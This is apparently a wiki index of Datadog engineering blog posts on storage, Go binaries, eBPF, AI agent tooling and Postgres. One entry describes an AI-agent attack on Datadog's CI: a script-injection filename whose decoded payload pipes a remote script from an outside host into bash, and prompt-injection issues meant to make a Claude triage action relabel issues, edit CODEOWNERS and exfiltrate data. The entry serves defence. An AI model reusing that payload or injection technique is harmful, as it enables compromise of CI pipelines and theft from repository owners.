Datadog¶
Datadog Engineering — Datadog is an observability / APM / monitoring vendor; its engineering blog documents the internals of their ingest, storage, query, and analytics stack at "trillions of events per day" scale.
Tier: Datadog is not in AGENTS.md's formal Tier 1/2/3 lists; treat as Tier-3-equivalent for scope — apply the Tier-3 selectivity filter (skip pure-ML research / product-PR). Distributed-systems- internals posts (e.g., Husky) are on-topic and ingested in full; foundation-model-research announcements (e.g., Toto) are skipped.
Key systems / series covered¶
- systems/husky — distributed observability event store over object storage (S3 / GCS / Azure Blob) + FoundationDB metadata. Custom Parquet-like columnar fragment format; hybrid size-tiered + locality (leveled) LSM compaction; trimmed-FSA-regex per-fragment pruning filters. 3-part series: intro, ingestion deep-dive, compaction (ingested 2025-01-29).
- Go runtime debugging — production-scale Go fleet operation;
2025 post traces a Go 1.24 memory regression across hundreds of
pods through
/proc/[pid]/smapsand upstream collaboration with the Go team. Extended 2026-02-18 into Go binary-size engineering: the 6-month / 77 % Agent-binary reduction program (sources/2026-02-18-datadog-how-we-reduced-agent-go-binaries-up-to-77-percent) covering dependency auditing via systems/goda + systems/go-size-analyzer, re-enabling the Go linker's method dead-code elimination, and tracing a 245-MiBamd64-only regression to containerd's stdlibpluginimport. Four upstream PRs (containerd, kubernetes/kubernetes, uber-go/dig, google/go-cmp) make this a canonical patterns/upstream-the-fix datum — Kubernetes inherited the method-DCE win for free and reports 16-37 % of its own. - systems/datadog-workload-protection — Datadog's Linux runtime-security product. On-host Agent + eBPF programs across file / process / network hooks, with process + container context. Built on systems/ebpf-manager (OSS Go lifecycle library) + systems/co-re + fallbacks for kernels back to 4.14. Dogfooded on Datadog's own edge.
- systems/datadog-workload-protection-fim — the FIM subsystem; Agent-side rules + in-kernel filtering (approvers
- discarders in eBPF maps) reduce a ~10B file-events/min stream to ~1M events/min forwarded, ~94% of events resolved in the kernel (ingested 2025-11-18; expanded 2026-01-07 with broader Workload Protection context).
- systems/datadog-mcp-server — Datadog's official Model Context Protocol server; observability interface designed for customer AI agents. V1 thin-API-wrapper failed on agent-specific modes (context-window overflow, token-blowout on variable records, trend-inference-from-samples); redesigned around concepts/agent-context-window as the scarce resource. Five-pattern response: CSV/YAML over JSON + default-trim (~5× records/budget), patterns/token-budget-pagination, patterns/query-language-as-agent-tool (SQL; ~40% cheaper eval runs), patterns/tool-surface-minimization (flexible tools + toolsets + layering), patterns/actionable-error-messages.
- systems/bits-ai-sre — Datadog's hosted SRE agent (web-UI alert investigator); the "specialized agent" counter- example to the general-purpose MCP server, framing the design trade-off Datadog now pitches as a blurring boundary.
- systems/bits-ai-sre-eval-platform — Bits' offline, replayable evaluation platform. Tens of thousands of scenarios per weekly full run. Built on a ground-truth + world-snapshot label split, deliberately noisy simulated environments, product-feedback-derived labels, and agent-assisted label validation. Now generalised across Datadog APM, Database Monitoring, and other agentic products.
- systems/postgresql — Datadog runs Postgres as a
metadata store for host lifecycle tracking (
hosts,host_last_ingested); 2026-03-23 post is a WAL-level debugging case on this substrate. Datadog's 2025-11-04 CDC-platform post re-frames Postgres as the CDC source of a managed multi-tenant replication platform:wal_level=logical+ publications + slots + heartbeat tables feed Debezium source connectors on Kafka Connect, which publish to Kafka for downstream Elasticsearch / Postgres / Iceberg / Cassandra / cross-region-Kafka sinks. - Managed multi-tenant CDC replication platform
(patterns/managed-replication-platform) — platform seeded by
a single Postgres-to-Elasticsearch pipeline (Metrics Summary
page, p90 ~7 s → ~1 s, replication lag ~500 ms) and generalised
into five sink classes. Five composed patterns:
Debezium + Kafka
Connect transport backbone,
Temporal-
orchestrated provisioning over the 7-step manual runbook,
offline migration-SQL
validator blocking pipeline-breaking DDL like
SET NOT NULL, Kafka Schema Registry in backward-compat mode (multi-tenant, Avro- serialised, protects external custom consumers too), and SMT + centralised enrichment API as the two-axis per-tenant customisation surface. Explicit architectural choice of async replication for scalability over strict consistency (ingested 2026-04-22). - systems/bewaire — Datadog's LLM-driven malicious-PR detection pipeline; two-stage LLM classifier over ~10,000 weekly PRs, verdicts routed through Cloud SIEM → SIRT case → incident. First publicly disclosed production catch: the 2026-02-27 hackerbot-claw campaign, the wiki's canonical instance of autonomous attack agents. Five-pattern defensive playbook for LLM-powered GitHub Actions (patterns/untrusted-input-via-file-not-prompt
- patterns/llm-output-as-untrusted-input +
patterns/minimally-scoped-llm-tools + use-recent-models +
keep-secrets-out-of-LLM-step) in the
2026-03-09 hackerbot-claw retrospective. Defence-in-depth
containment via patterns/org-wide-github-rulesets: when
hackerbot-claw achieved CI code execution on
datadog-iac-scannerthrough script injection, org rulesets reduced the blast radius to a harmless commit on a throwaway branch. Datadog also maintains systems/dd-octo-sts-action, a fork of Chainguard's systems/octo-sts, as the OIDC-federated PAT replacement for GitHub workflow credentials.
Key concepts / patterns introduced into the wiki from Datadog¶
- concepts/lsm-compaction — size-tiered + leveled hybrid.
- concepts/columnar-storage-format — with adaptive row-group sizing + inline column headers for streaming.
- concepts/fragment-pruning — per-file skip-index design axis.
- patterns/streaming-k-way-merge — 1-GET-per-input bounded- memory CPU-saturated compaction merge.
- patterns/trimmed-automaton-predicate-filter — FSA → regex in metadata, Bloom-analog with no false negatives.
- concepts/go-runtime-memory-model — Go runtime virtual-vs-RSS
divergence;
/proc/[pid]/smapsas the ground truth theruntime/ metricspackage cannot see. - concepts/binary-size-bloat — 5-year Agent
.debgrowth 428 → 1,248 MiB (+192 %) as the canonical bloat datum; 6-month reduction program as the canonical cure recipe. - concepts/dead-code-elimination — Go linker's method-DCE surface: what disables it (reflect / plugin-mode), what re-enables it (source patches).
- concepts/go-build-tags — file-level compile guard; the mechanism behind Datadog's per-binary / per-platform build matrix and the upstream containerd fix.
- concepts/transitive-dependency-reachability — graph-theoretic reason a single function can drag a 570-package k8s cluster into an unrelated binary.
- concepts/reflect-methodbyname-linker-pessimism — 16-25 %
per-binary cost of a non-constant
reflect.MethodByNamecall site; Datadog patched ~a dozen dependencies + forked stdlibtext/template+html/template. - concepts/go-plugin-dynamic-linking-implication — 245 MiB
cost of importing stdlib
plugintransitively viacontainerdonamd64only. - patterns/upstream-the-fix — Datadog's four PRs (containerd / kubernetes / uber-go/dig / google/go-cmp) canonicalised the Go-toolchain variant of Cloudflare's 2025-10 shape; Kubernetes inherited 16-37 % of its own.
- patterns/build-tag-dependency-isolation — upstream
containerd
plugin-import build tag; the Agent applies it. - patterns/single-function-forced-package-split — trace-agent one-function-pulls-k8s case: 570 packages / 36 MiB removed by moving one function.
- patterns/bisect-driven-regression-hunt — production-signal →
env bisect → feature-flag A/B → drop-one-observability-layer →
minimal reproducer → upstream
git bisect→ maintainer fix. - systems/ebpf — kernel programmable runtime; the substrate under Workload Protection's FIM.
- concepts/in-kernel-filtering — push per-event match logic into eBPF programs so the ring buffer carries only plausible matches.
- concepts/edge-filtering — Agent-side rule evaluation as the pipeline-volume-reduction move (producer-side filter; composes with streaming aggregation).
- patterns/approver-discarder-filter — compile-time positive filters + runtime-learned negative filters in eBPF maps.
- patterns/two-stage-evaluation — cheap O(1) kernel filter protecting a rich user-space rule engine.
- concepts/ebpf-verifier — both safety guarantee and the primary source of operational variability across kernel versions / distros; motivates CI matrices + lifecycle abstractions + minimum-viable hook-set gating.
- systems/co-re — Compile Once – Run Everywhere; BTF-backed offset patching; with fallback offset-guessing + hardcoded offsets covers kernels back to 4.14.
- systems/ebpf-manager — Datadog's OSS Go library consolidating eBPF program lifecycle across Workload Protection, Cloud Network Monitoring, Universal Service Monitoring.
- patterns/shared-kernel-resource-coordination — multi-vendor eBPF coexistence (TC priorities + handles, cgroup ordering); the named case study is the 2022 Datadog × systems/cilium TC-handle-collision incident.
- concepts/agent-context-window — the fixed-size LLM working set as the dominant scarce resource in MCP-server design; Datadog reframes format, pagination, query surface, tool count, and error design as applications of this one discipline.
- patterns/token-budget-pagination — cut at N tokens, return cursor; robust against record-size variance (Datadog log records span 100 B to 1 MB).
- patterns/query-language-as-agent-tool — expose SQL, not raw retrieval; ~40% cheaper eval runs in some Datadog scenarios.
- patterns/tool-surface-minimization — flexible tools + opt-in toolsets + layering (tool chaining) as three complementary ways to stay within agent tool-calling accuracy + context budget.
- patterns/actionable-error-messages — specific corrective
errors (
"did you mean 'status'?") as the agent-recovery primitive; paired with discoverable-docs tool + advisory-guidance-in-success-responses. - concepts/wal-write-ahead-logging — Postgres WAL as both the
durability primitive and the hard throughput ceiling (~1,000
8-KiB fsyncs/sec on gp3 EBS per
pg_test_fsync); every committed transaction costs one fsync, and row locks that assign a transaction ID force a COMMIT record whether or not data actually changed. - concepts/postgres-mvcc-hot-updates — Postgres MVCC writes a
new tuple per
UPDATE; HOT updates skip index writes when no indexed column changes and the same page has free space (fillfactor<100); HOT composes with update cost, not lock cost — the Datadog case study where a HOT-optimized table still suffered 2× IOPS becauseON CONFLICT DO UPDATElocks beforeWHERE. - patterns/cte-emulated-upsert — Postgres-specific query
pattern:
WITH insert_attempt AS (INSERT ... ON CONFLICT DO NOTHING RETURNING ...) UPDATE ... WHERE ... AND NOT EXISTS (SELECT FROM insert_attempt). Avoids the implicit conflict-row lock ofON CONFLICT DO UPDATE; common fresh-row path emits zero WAL records. Trade-off: small concurrent-delete race, accepted only when workload tolerates imprecision. - concepts/evaluation-label — two-part eval unit: ground truth
- world snapshot (telemetry queries, not raw bytes). Agent never sees the ground truth; world snapshot survives raw-telemetry TTL.
- concepts/trajectory-evaluation — score how the agent investigated (depth, telemetry surfaced, distance to correct answer), not only final-answer correctness. Unlocked at Datadog by a ~30% uplift in label RCA quality.
- concepts/pass-at-k — over k attempts, does the agent succeed on at least one? Separates capability from sampling stability; standard label attribute in the Bits eval platform.
- concepts/noise-injection-in-evaluation — simulated eval environments must include unrelated components on the same platform/team/monitor/naming cluster. Without it, evals are an open-book exam with only the relevant pages; scores over-state production quality.
- concepts/telemetry-ttl-one-way-door — raw telemetry expires; decisions to defer snapshotting are decisions to permanently lose it. Short-term 11% pass-rate + 35% label-count hit when Datadog regenerated too-narrow labels with broader scope, for long-term eval fidelity.
- patterns/product-feedback-to-eval-labels — every user thumbs-up/-down + free-text feedback becomes a candidate eval label; label volume scales with adoption (+order-of-magnitude over manual internal labelling).
- patterns/agent-assisted-label-validation — once alignment studies with human judges clear a quality bar, use the agent itself to aggregate signals + derive RCAs + propose labels; humans shift from assembling to refining. Validation time per label ↓ >95% in one week at Datadog.
- patterns/noisy-simulated-evaluation-environment — the operational shape for noise injection: expand the world snapshot along platform/team/monitor/naming adjacency edges, reconstruct signals for the noisy set, isolate per-label at the data layer.
- concepts/change-data-capture — Datadog's 2025-11-04 CDC platform is the wiki's canonical instance of CDC as a first-class multi-tenant platform (vs. the earlier table-format-compaction and real-time-cache-invalidation framings).
- concepts/asynchronous-replication — deliberately chosen as the foundation of Datadog's CDC platform ("favouring scalability over strict consistency"); ~500 ms replication lag as the operating point.
- concepts/schema-evolution — the "hard problem" of async CDC. Datadog's two-layer answer (offline migration-SQL validator + runtime backward-compat Schema Registry) is the canonical wiki reference.
- concepts/logical-replication — Postgres logical replication
with
wal_level=logicalas a CDC source; 7-step source-side operator runbook documented via Datadog's 2025-11-04 post. - systems/debezium — Kafka Connect-based CDC source- connector family; core ingestion component of Datadog's CDC platform. Datadog maintains custom forks for Datadog-specific logic.
- systems/kafka-connect — "backbone for scalable, fault- tolerant data movement between systems" in Datadog's CDC platform; single-message transforms as the per-tenant customisation surface.
- systems/kafka-schema-registry — multi-tenant, backward- compat mode, integrated with source + sink connectors; protects external custom consumers too.
- systems/temporal — durable-workflow engine used to automate the 7-step CDC-pipeline provisioning runbook.
- patterns/managed-replication-platform — Datadog's platform shape; five-pattern bundle above.
- patterns/debezium-kafka-connect-cdc-pipeline — OSS CDC transport backbone.
- patterns/workflow-orchestrated-pipeline-provisioning — Temporal-decomposed provisioning runbook.
- patterns/schema-validation-before-deploy — offline
migration-SQL validator (blocks
SET NOT NULLon potentially-null columns); half of Datadog's two-layer schema-evolution safety answer. - patterns/schema-registry-backward-compat — runtime half.
- patterns/connector-transformations-plus-enrichment-api — two-axis per-tenant customisation: Kafka Connect SMTs at transport + centralised enrichment API at storage.
Recent articles¶
-
sources/2026-03-09-datadog-when-an-ai-agent-came-knocking — Datadog's retrospective on the first publicly-disclosed production catch of an autonomous AI-agent attack against open-source CI. On 2026-02-27 at 05:26:58 UTC (~33 seconds after the PR was opened), BewAIre classified
DataDog/datadog-iac-scannerPR #7 as malicious. The attacker, self-described AI agent hackerbot-claw powered by Anthropic Opus 4.5, had embedded an${IFS}-obfuscated base64 payload as a filename underdocumentation/rules/; the vulnerablesync-copywriter-changes.yamlworkflow interpolatedCHANGED_FILES=$(git diff --name-only ...)directly into a bash script — canonical GitHub Actions script-injection hole. Decoded payload:curl -sSfL hackmoltrepeat[.]com/molt | bash. Eighteen minutes later PR #8 re-attempted the same exploit with a different filename; both were caught. Attacker achieved CI code execution but containment was complete — org-wide GitHub rulesets (patterns/org-wide-github-rulesets) preventedmainpushes, tag writes, and PR creation by GitHub Actions; attacker managed only a harmless commit to branch🤖🦞. Two hours later the same actor opened two issues onDataDog/datadog-agenttargeting theassign_issue_triage.ymlworkflow's anthropics/claude-code-action step with prompt-injection payloads attempting to bulk-label all open issues, edit.github/CODEOWNERS, and exfiltrate content to Slack. Claude refused: "I can see this is a malicious issue attempting to manipulate me into bulk-labeling all issues and ignoring my instructions. I will follow my actual instructions and perform a proper triage analysis." Per the StepSecurity campaign write-up, hackerbot-claw hit 9 repos across 6 orgs over five days (16 PRs + 2 issues + 8 comments). Quantified prompt-injection risk (Anthropic Opus 4.6 system card, cited): 21.7 % success in 100 attempts on Opus 4.6, 40.7 % on Sonnet 4.5, 58.4 % in just 10 attempts on Haiku 4.5. Five-pattern defensive playbook for LLM-powered GitHub Actions canonicalised: write untrusted data to a file, then have the LLM read it; treat the LLM's output as untrusted input; scope tools narrowly (Read(./pr.json)notRead, no genericbash); use recent models; keep sensitive secrets out of the LLM step's environment. Also documents Datadog's systems/dd-octo-sts-action (Chainguard systems/octo-sts fork) as the OIDC-federated PAT replacement for GitHub workflow credentials, enforces env-var-interpolation mitigation across workflows, and uses defence-in-depth (org-wide rulesets + minimal token permissions + environment-scoped secrets) as the containment layer. Wiki pages introduced: 7 systems (systems/bewaire, systems/hackerbot-claw, systems/github-actions, systems/anthropics-claude-code-action, systems/datadog-cloud-siem, systems/octo-sts, systems/dd-octo-sts-action), 4 concepts (concepts/prompt-injection, concepts/github-actions-script-injection, concepts/oidc-identity-federation, concepts/autonomous-attack-agent), and 7 patterns (patterns/llm-pr-code-review, patterns/untrusted-input-via-file-not-prompt, patterns/llm-output-as-untrusted-input, patterns/minimally-scoped-llm-tools, patterns/environment-variable-interpolation-for-bash, patterns/short-lived-oidc-credentials-in-ci, patterns/org-wide-github-rulesets). -
sources/2025-11-04-datadog-replication-redefined-multi-tenant-cdc-platform — How Datadog built its managed, low-latency, multi-tenant data-replication platform. Narrative opens on a Metrics Summary page slow-query incident: join of 82K active metrics × 817K metric configurations per org query on a shared Postgres hit p90 ~7 s, every facet adjustment triggering another expensive query, rising error rate + reduced throughput under concurrent load (APM-confirmed). Re-architecture recognised that real-time search + faceted filtering is fundamentally different from OLTP; rerouted to a dedicated search platform populated by dynamic denormalisation during replication from Postgres — page load ~30 s → ~1 s (up to 97%) with replication lag ~500 ms. That single pipeline became the seed of a managed multi-tenant replication platform on four architectural pillars: (1) automated pipeline provisioning with Temporal workflows replaces the manual 7-step runbook (enable
wal_level=logical, create Postgres users, create publications + slots, deploy Debezium, create Kafka topics, set up heartbeat tables, configure sink connectors) with modular reliable tasks stitched into higher-level orchestrations — "operational load grew exponentially" was the explicit driver (patterns/workflow-orchestrated-pipeline-provisioning); (2) asynchronous replication as the foundation, chosen over synchronous "favouring scalability over strict consistency" — decouples application performance from network latency + replica responsiveness, accepts minor data lag during failures; (3) schema-evolution safety via two layers — automated migration-SQL validation offline (blocks e.g.ALTER TABLE ... ALTER COLUMN ... SET NOT NULLthat would break in-flight null-carrying messages) + multi-tenant Kafka Schema Registry in backward-compat mode at runtime (Avro- serialised, data + schema pushed together, external custom consumers share the contract); (4) per-tenant pipeline customisation via two surfaces (patterns/connector-transformations-plus-enrichment-api): Kafka Connect single-message transforms (dynamic topic rename, column type conversion, composite PK by field concatenation, add/drop columns) + custom connector forks where OSS falls short, plus a standardised enrichment API atop the search platform for shared derivation logic. One Postgres-to-search pipeline generalised to five sink classes: Postgres-to-Postgres (unwinding the shared monolithic DB + Orgstore backups), Postgres-to-Iceberg (event-driven analytics), Cassandra replication (source generalisation beyond SQL), cross-region Kafka replication (data locality + resilience for Datadog On-Call). Headline operating numbers in summary bullets: search-query latency ↓ up to 87% (summary list) / page load ↓ up to 97% (body). Introduces systems/debezium, systems/kafka-connect, systems/kafka-schema-registry into the wiki; extends systems/kafka, systems/postgresql, systems/elasticsearch, systems/apache-iceberg, systems/temporal, concepts/change-data-capture, concepts/wal-write-ahead-logging, concepts/backward-compatibility; creates concepts/asynchronous-replication, concepts/schema-evolution, concepts/logical-replication, patterns/managed-replication-platform, patterns/debezium-kafka-connect-cdc-pipeline, patterns/workflow-orchestrated-pipeline-provisioning, patterns/schema-validation-before-deploy, patterns/schema-registry-backward-compat, patterns/connector-transformations-plus-enrichment-api. -
sources/2026-04-07-datadog-bits-ai-sre-eval-platform — How Datadog built the offline, replayable evaluation platform for Bits AI SRE. Not the agent itself — the infrastructure that makes agent behaviour observable, measurable, and repeatable across changes, built because features improved one investigation class while quietly regressing unrelated scenarios (e.g. an early auto-extraction of the monitor's service name degraded unrelated investigations by pulling in irrelevant signals). Two prior attempts failed: per-tool isolated testing (wrongly assumed compositional correctness — real failures emerge from how Bits chains tools and reasons across outputs) and re-running live investigations (no aggregation, environment drift, telemetry expiry, no replay). Architecture: (1) curated label set — each label has two parts, ground truth (real root cause; agent never sees it) and world snapshot (queries that reconstruct the signals the agent would have seen, not raw telemetry — survives concepts/telemetry-ttl-one-way-door); (2) orchestration platform that runs Bits against labels at scale, scores results, tracks history. Simulated environments are deliberately noisy — expanded to include unrelated components on the same platform/team/monitor/naming cluster (patterns/noisy-simulated-evaluation-environment, forced by the production reality that SREs sift red herrings). Label pipeline evolved manual → product-feedback-driven (every user interaction → candidate label, +order-of-magnitude label-creation rate) → Bits-assisted validation (alignment studies with human judges gate trust; validation time ↓ >95% in one week; label quality ↑ ~30% measured as 5-Whys-RCA pass rate). Higher-quality labels unlocked concepts/trajectory-evaluation (score how the agent investigated, not just final answer) and concepts/pass-at-k (capability vs. sampling-stability separation). Explicit retrospective on the one-way-door cost of early narrow labels: regenerating with broader scope cost −11% pass rate, −35% label count short-term, long-term evaluations became predictive of production behaviour. Full eval set runs weekly across tens of thousands of scenarios; results piped to Datadog dashboards + Datadog LLM Observability + Slack alerts. New models evaluated upfront (Claude Opus 4.5 fully scored within days, per-domain improvement/regression breakdown before rollout). Platform now generalises beyond Bits — APM, Database Monitoring, and internal incidents all become eval labels.
-
sources/2026-03-23-datadog-debugging-postgres-upsert-wal — Production Postgres debugging at the WAL level. A
last_ingestedupsert table deliberately designed for HOT updates (narrow dedicated table, unindexed tracked column,fillfactor=80) nonetheless doubled write IOPS and quadrupled WAL syncs at ~500 upserts/sec, heading for the single-writer fsync ceiling at the targeted 25,000/sec. Using the Postgres-15pg_walinspectextension + anlldbbreakpoint onWALInsertLockAcquire, Datadog proves thatINSERT ... ON CONFLICT DO UPDATElocks the conflicting row before theWHEREclause is evaluated, the lock assigns a transaction ID, the xid forces aTransaction COMMITrecord, and the COMMIT forces a WAL fsync — every no-op upsert costs one fsync. Fix: a patterns/cte-emulated-upsert that composesON CONFLICT DO NOTHINGinside a CTE with a separate conditionalUPDATEgated onNOT EXISTS (SELECT FROM insert_attempt). On the common fresh-row path this emits zero WAL records. Trade-off: a small concurrent-delete race window, accepted because host-liveness tracking is inherently imprecise. Introduces concepts/wal-write-ahead-logging and concepts/postgres-mvcc-hot-updates into the wiki; extends systems/postgresql. -
sources/2026-03-04-datadog-mcp-server-agent-tools — Design retrospective on Datadog's official MCP server — first observability interface built for customer AI agents rather than humans/programmatic clients. V1 thin-API-wrapper failed on three agent-specific modes (context-window overflow from raw data; token blowout on variable-size records; brute- force sample-and-infer for aggregation questions). Redesigned around concepts/agent-context-window as the dominant scarce resource, yielding five patterns: (1) token-efficient formats — CSV for tabular (~½ tokens/record vs JSON), YAML for nested (~−20%), + default-field trimming (~5× more records/budget); (2) patterns/token-budget-pagination (Datadog log records span 100 B to 1 MB — record-count pagination is effectively unbounded in tokens); (3) patterns/query-language-as-agent-tool — SQL surface so agents
SELECT/LIMIT/COUNT/GROUP BYinstead of sampling; ~40% cheaper eval runs in some scenarios, "at our scale traditional relational databases don't work"; (4) patterns/tool-surface-minimization — flexible tools + opt-in toolsets + layering (tool chaining, with +1 call latency cost); (5) patterns/actionable-error-messages — specific corrective errors ("did you mean 'status'?") +search_datadog_docsRAG tool reachable from server instructions + advisory prose inside successful responses ("you searched forpayment, did you meanpayments?"). Positioning vs systems/bits-ai-sre (hosted SRE agent with purpose-built web UI) as the general-MCP-server ↔ specialized- agent trade-off, with stated roadmap to expose Bits AI SRE capabilities through MCP. - sources/2026-02-18-datadog-how-we-reduced-agent-go-binaries-up-to-77-percent
— 6-month retrospective on cutting the
Datadog Agent Go-binary sizes by up
to 77 % (Dec 2024 → Jul 2025) across versions 7.60.0 →
7.68.0 without removing any feature. Linux
amd64.deb: 265 MiB → 149 MiB compressed (−44 %), 1.22 GiB → 688 MiB uncompressed (−44 %). Per-binary: Core 236 → 103 (−56 %), Process 128 → 34 (−74 %), Trace 90 → 23 (−74 %), Security 152 → 35 (−77 %), System Probe 180 → 54 (−70 %) MiB. Three- part recipe: (1) systematic dependency auditing with goda (why each dep was imported) + go-size-analyzer (how much in bytes) +go list(what is in the binary) — canonical find: trace-agent pulled 526 k8s packages / ≥30 MiB via one function in one package; fix was a package split (#32174) removing 570 packages and 36 MiB — "more than half of the binary", "an extreme example, but not a unique one". (2) Re-enabling method dead-code elimination — the Go linker drops methods no code calls, but any non-constantreflect.MethodByName(canonical offenders: stdlibtext/template+html/template) forces retention of every exported method of every reachable type (concepts/reflect-methodbyname-linker-pessimism). Datadog patched ~a dozen dependencies (kubernetes/kubernetes#132177, uber-go/dig#425, google/go-cmp#373) and forked stdlibtext/template+html/templateintopkg/template/with the method-call code path statically disabled. Result: 16-25 % per binary / ~100 MiB total Linuxamd64. Iterative diagnosis via whydeadcode — which consumes the linker's-dumpdepoutput and names the first culprit call-chain — fix, re-run, repeat. (3) Unblocking anamd64-only regression that — after a hack-first bound (comment out every DCE-disabler to see the ceiling) — turned out to be containerd'splugin/plugin_go18.goimporting the stdlibpluginpackage: just importingpluginputs the linker into dynamically-linked mode, which disables method-DCE AND keeps every unexported method (concepts/go-plugin-dynamic-linking-implication). Datadog upstreamed containerd#11203 to gate the import behind a build tag (patterns/build-tag-dependency-isolation) and applied the tag via #32538 - #32885.
Result: 245 MiB (~20 % of total) reduction on main
Linux
amd64artifacts, benefiting ~75 % of users. Ecosystem-level compound benefit — Kubernetes contributors subsequently enabled method-DCE on their own binaries and report 16-37 % size reductions. Canonical wiki datum for concepts/binary-size-bloat (5-year 428 → 1,248 MiB pre-cure growth) + concepts/dead-code-elimination + patterns/upstream-the-fix (third instance, Go-toolchain variant of Cloudflare's 2025-10 shape) + patterns/measurement-driven-micro-optimization (binary- size variant: profile → explain → bound → fix loop). Introduces systems/datadog-agent, systems/go-compiler, systems/go-linker, systems/goda, systems/go-size-analyzer, systems/whydeadcode, systems/containerd, systems/text-template, systems/html-template into the wiki; extends systems/kubernetes (both victim and beneficiary); creates concepts concepts/binary-size-bloat, concepts/dead-code-elimination, concepts/go-build-tags, concepts/transitive-dependency-reachability, concepts/reflect-methodbyname-linker-pessimism, concepts/go-plugin-dynamic-linking-implication; creates patterns patterns/build-tag-dependency-isolation, patterns/single-function-forced-package-split; extends patterns/upstream-the-fix and patterns/measurement-driven-micro-optimization. - sources/2026-01-07-datadog-hardening-ebpf-for-runtime-security
— 5-year operational retrospective on systems/ebpf at
Workload Protection scale. Six pitfall classes with mitigations:
kernel-version portability (verifier evolution, helper
availability, hook-point naming, inlining, dead-code
elimination — mitigated by CI matrix + systems/co-re +
systems/ebpf-manager + minimum-viable-hook-set gating);
syscall-hook coverage (compat syscalls,
raw_tracepoints,io_uring,binfmt_misc, interpreters); hooks not firing reliably (kretprobemaxactive, HW interrupts, module lifecycle); data-read correctness (kernel-struct drift, paged-out user memory, TOCTOU, path resolution, non-linearskb); eBPF map & cache pitfalls (sizing, LRU semantics,BPF_F_NO_PREALLOCOOM risk, blocking syscalls pinning entries, lost / out-of-order events); rule-writing (symlinks, hard links, interpreter visibility, syscall-args-≠-shell-commands). Plus: eBPF as attack surface (2021 ebpfkit rootkit PoC; CVE-2023-2163 / CVE-2024-41003 verifier exploits; dedicatedbpfevent type + helper/map inventory + tamper-protection research); multi-tenancy (2022 Datadog × systems/cilium TC-handle-collision incident → patterns/shared-kernel-resource-coordination); performance cost (uprobes ≫ kprobes,LRU_HASHvsPERCPU_ARRAY, ~95% in-kernel filter quoted as the reason Workload Protection runs on Datadog's own edge); safe rollout (CI matrix + dogfooding + staged rollout — explicitly framed against the 2024 CrowdStrike incident). - sources/2025-11-18-datadog-ebpf-fim-filtering
— Scaling real-time file monitoring with eBPF: how Datadog
Workload Protection's File Integrity Monitoring filters billions
of kernel events per minute. Inputs: ~10B file-related events/min
fleet-wide, ~5 KB/event, up to 5K security-relevant syscalls/sec
on sensitive workloads. Design: eBPF programs hook file syscalls
→ ring buffer → user-space Agent rule engine → backend. Two-stage
evaluation: (1) in-kernel filtering via eBPF maps —
approvers (rule-compile-time-extracted concrete values like
/etc/passwd) and discarders (runtime-learned LRU negatives like/tmpunder a/etc/*ruleset) — (2) full user-space rule engine on the remainder. ~94% of events dropped in-kernel; ~1M events/min actually forwarded. Framed against legacy alternatives: periodic scans miss tamper-revert + lack change context;inotifyhas no process/container attribution;auditdhas context but scales poorly. - sources/2025-07-17-datadog-go-124-memory-regression
— Part 1 of a 2-part Go 1.24 rollout retrospective. ~20% RSS
increase across a data-processing fleet was invisible to Go's
runtime/metrics;/proc/[pid]/smapslocalized it to the Go- heap VMA; live heap profile pointed to large pointer-bearing channels/maps;heapbench+git bisectlanded on the Go 1.24mallocgcrefactor (CL 614257), which silently removed a "skip zeroing for OS-fresh memory" optimization for >32 KiB pointer- bearing allocations. Upstream fix (CL 659956) ships in Go 1.25. - sources/2025-01-29-datadog-husky-efficient-compaction-at-datadog-scale — Husky compaction: columnar fragment format designed for streaming merge, hybrid LSM (size-tiered → locality), trimmed-FSA-regex pruning, FoundationDB atomic fragment-swap transactions. 30% query-worker-fleet reduction from the locality-compaction layer alone.
Skipped articles¶
- Toto time-series foundation model (2024-07-11) — pure ML research announcement, no serving-infra architecture, explicitly "not currently deployed in any production systems" per the post itself. See log entry [2026-04-21 11:17].